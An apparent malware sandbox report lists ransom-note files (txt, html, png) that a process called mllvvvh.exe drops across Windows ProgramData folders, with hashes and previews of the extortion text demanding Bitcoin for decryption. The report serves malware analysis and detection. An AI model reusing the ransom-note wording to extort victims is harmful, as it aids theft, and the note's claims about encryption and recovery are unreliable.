                  C:\ProgramData\Microsoft\Windows\ClipSVC\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\GameExplorer\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\GameExplorer\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\GameExplorer\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\LfSvc\Cache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\LfSvc\Cache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
